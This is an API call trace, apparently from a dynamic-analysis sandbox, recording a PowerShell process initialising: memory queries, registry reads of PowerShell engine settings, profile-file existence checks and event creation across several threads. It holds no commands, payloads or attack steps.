	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.196] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.197] VirtualQuery (in: lpAddress=0x1cb630, lpBuffer=0x1cc4f0, dwLength=0x30 | out: lpBuffer=0x1cc4f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.198] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0332.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.198] CoTaskMemFree (pv=0x2a1760) 
	[0332.200] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0332.200] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.200] CoTaskMemFree (pv=0x2a1760) 
	[0332.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.224] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.224] VirtualQuery (in: lpAddress=0x1cb8e0, lpBuffer=0x1cc7a0, dwLength=0x30 | out: lpBuffer=0x1cc7a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0332.230] VirtualQuery (in: lpAddress=0x1cb8e0, lpBuffer=0x1cc7a0, dwLength=0x30 | out: lpBuffer=0x1cc7a0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.230] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.230] VirtualQuery (in: lpAddress=0x1cb130, lpBuffer=0x1cbff0, dwLength=0x30 | out: lpBuffer=0x1cbff0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x398) returned 0x0
	[0332.231] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6bc, lpData=0x0, lpcbData=0x1cd6b8*=0x0 | out: lpType=0x1cd6bc*=0x1, lpData=0x0, lpcbData=0x1cd6b8*=0x56) returned 0x0
	[0332.231] CoTaskMemAlloc (cb=0x5a) returned 0x1b74e270
	[0332.231] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd68c, lpData=0x1b74e270, lpcbData=0x1cd688*=0x56 | out: lpType=0x1cd68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd688*=0x56) returned 0x0
	[0332.231] CoTaskMemFree (pv=0x1b74e270) 
	[0332.231] RegCloseKey (hKey=0x398) returned 0x0
	[0332.231] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd738 | out: phkResult=0x1cd738*=0x398) returned 0x0
	[0332.232] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd6bc, lpData=0x0, lpcbData=0x1cd6b8*=0x0 | out: lpType=0x1cd6bc*=0x1, lpData=0x0, lpcbData=0x1cd6b8*=0x56) returned 0x0
	[0332.232] CoTaskMemAlloc (cb=0x5a) returned 0x1b74e270
	[0332.232] RegQueryValueExW (in: hKey=0x398, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd68c, lpData=0x1b74e270, lpcbData=0x1cd688*=0x56 | out: lpType=0x1cd68c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd688*=0x56) returned 0x0
	[0332.232] CoTaskMemFree (pv=0x1b74e270) 
	[0332.232] RegCloseKey (hKey=0x398) returned 0x0
	[0332.232] CoTaskMemAlloc (cb=0x20c) returned 0x2c5790
	[0332.232] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2c5790 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0332.233] CoTaskMemFree (pv=0x2c5790) 
	[0332.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0332.233] CoTaskMemAlloc (cb=0x20c) returned 0x2c5790
	[0332.233] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2c5790 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0332.233] CoTaskMemFree (pv=0x2c5790) 
	[0332.233] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1cd2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0332.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0332.234] SetErrorMode (uMode=0x1) returned 0x1
	[0332.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd6a0 | out: lpFileInformation=0x1cd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0332.234] SetErrorMode (uMode=0x1) returned 0x1
	[0332.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0332.234] SetErrorMode (uMode=0x1) returned 0x1
	[0332.234] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd6a0 | out: lpFileInformation=0x1cd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0332.235] SetErrorMode (uMode=0x1) returned 0x1
	[0332.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0332.235] SetErrorMode (uMode=0x1) returned 0x1
	[0332.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd6a0 | out: lpFileInformation=0x1cd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0332.235] SetErrorMode (uMode=0x1) returned 0x1
	[0332.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cd490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0332.235] SetErrorMode (uMode=0x1) returned 0x1
	[0332.235] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cd6a0 | out: lpFileInformation=0x1cd6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0332.235] SetErrorMode (uMode=0x1) returned 0x1
	[0332.236] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0332.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0332.236] CoTaskMemFree (pv=0x2a1760) 
	[0333.095] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.095] CoTaskMemFree (pv=0x2a1760) 
	[0333.095] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.095] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.095] CoTaskMemFree (pv=0x2a1760) 
	[0333.096] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.096] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.096] CoTaskMemFree (pv=0x2a1760) 
	[0333.100] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.100] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.101] CoTaskMemFree (pv=0x2a1760) 
	[0333.101] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0333.101] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3b0
	[0333.101] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x378
	[0333.101] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x39c
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3a0
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x330
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1d4
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x334
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0333.102] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0333.103] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.103] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.103] CoTaskMemFree (pv=0x2a1760) 
	[0333.105] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0333.105] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cd880 | out: lpMode=0x1cd880) returned 1
	[0333.106] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.106] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.106] CoTaskMemFree (pv=0x2a1760) 
	[0333.110] SetEvent (hEvent=0x39c) returned 1
	[0333.110] SetEvent (hEvent=0x398) returned 1
	[0333.110] SetEvent (hEvent=0x3b0) returned 1
	[0333.110] SetEvent (hEvent=0x378) returned 1
	[0333.110] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0333.112] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0333.112] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0333.112] CoTaskMemFree (pv=0x2a1760) 
	[0333.113] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x344) returned 0x0
	[0333.114] RegQueryValueExW (in: hKey=0x344, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cd55c, lpData=0x0, lpcbData=0x1cd558*=0x0 | out: lpType=0x1cd55c*=0x0, lpData=0x0, lpcbData=0x1cd558*=0x0) returned 0x2

Thread:
	id = 100
	os_tid = 0x860


Thread:
	id = 107
	os_tid = 0x35c


Thread:
	id = 123
	os_tid = 0x594


Thread:
	id = 131
	os_tid = 0xa80


Thread:
	id = 132
	os_tid = 0xaf8

	[0266.127] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0311.208] CloseHandle (hObject=0x1d4) returned 1
	[0311.209] CloseHandle (hObject=0x13) returned 1
	[0311.209] CloseHandle (hObject=0xf) returned 1
	[0311.210] RegCloseKey (hKey=0x310) returned 0x0
	[0311.210] RegCloseKey (hKey=0x30c) returned 0x0
	[0311.210] RegCloseKey (hKey=0x308) returned 0x0
	[0311.210] LocalFree (hMem=0x267290) returned 0x0
	[0311.210] RegCloseKey (hKey=0x330) returned 0x0
	[0311.211] LocalFree (hMem=0x2672c0) returned 0x0
	[0316.929] RegCloseKey (hKey=0x330) returned 0x0
	[0321.203] RegCloseKey (hKey=0x390) returned 0x0
	[0321.203] RegCloseKey (hKey=0x38c) returned 0x0
	[0321.203] RegCloseKey (hKey=0x388) returned 0x0
	[0321.204] RegCloseKey (hKey=0x384) returned 0x0
	[0321.204] RegCloseKey (hKey=0x380) returned 0x0
	[0321.204] RegCloseKey (hKey=0x37c) returned 0x0
	[0321.204] RegCloseKey (hKey=0x354) returned 0x0
	[0321.204] RegCloseKey (hKey=0x3ac) returned 0x0
	[0321.205] RegCloseKey (hKey=0x374) returned 0x0
	[0321.205] RegCloseKey (hKey=0x370) returned 0x0
	[0321.205] RegCloseKey (hKey=0x36c) returned 0x0
	[0321.206] RegCloseKey (hKey=0x368) returned 0x0
	[0321.206] RegCloseKey (hKey=0x364) returned 0x0
	[0321.206] RegCloseKey (hKey=0x360) returned 0x0
	[0321.206] RegCloseKey (hKey=0x35c) returned 0x0
	[0321.207] RegCloseKey (hKey=0x358) returned 0x0
	[0321.207] RegCloseKey (hKey=0x3a8) returned 0x0
	[0321.207] RegCloseKey (hKey=0x3a4) returned 0x0
	[0321.208] RegCloseKey (hKey=0x348) returned 0x0
	[0321.208] RegCloseKey (hKey=0x344) returned 0x0
	[0321.208] RegCloseKey (hKey=0x340) returned 0x0
	[0321.208] RegCloseKey (hKey=0x33c) returned 0x0
	[0321.208] RegCloseKey (hKey=0x338) returned 0x0
	[0321.209] RegCloseKey (hKey=0x334) returned 0x0
	[0321.209] RegCloseKey (hKey=0x1d4) returned 0x0
	[0321.209] RegCloseKey (hKey=0x310) returned 0x0
	[0321.210] RegCloseKey (hKey=0x308) returned 0x0
	[0321.210] RegCloseKey (hKey=0x330) returned 0x0
	[0321.210] RegCloseKey (hKey=0x3a0) returned 0x0
	[0321.210] RegCloseKey (hKey=0x39c) returned 0x0
	[0321.210] RegCloseKey (hKey=0x378) returned 0x0
	[0321.211] RegCloseKey (hKey=0x3b0) returned 0x0
	[0321.211] RegCloseKey (hKey=0x394) returned 0x0
	[0641.630] RegCloseKey (hKey=0x3b4) returned 0x0
	[0641.630] RegCloseKey (hKey=0x344) returned 0x0

Thread:
	id = 217
	os_tid = 0xc40


Thread:
	id = 322
	os_tid = 0xfa0

	[0334.109] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0334.113] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0334.118] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.118] CoTaskMemFree (pv=0x2a1760) 
	[0334.120] VirtualQuery (in: lpAddress=0x1c7ade40, lpBuffer=0x1c7aed00, dwLength=0x30 | out: lpBuffer=0x1c7aed00*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0334.122] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.122] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.122] CoTaskMemFree (pv=0x2a1760) 
	[0334.125] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.126] CoTaskMemFree (pv=0x2a1760) 
	[0334.129] CoTaskMemAlloc (cb=0x104) returned 0x2a1760
	[0334.129] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a1760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0334.129] CoTaskMemFree (pv=0x2a1760) 
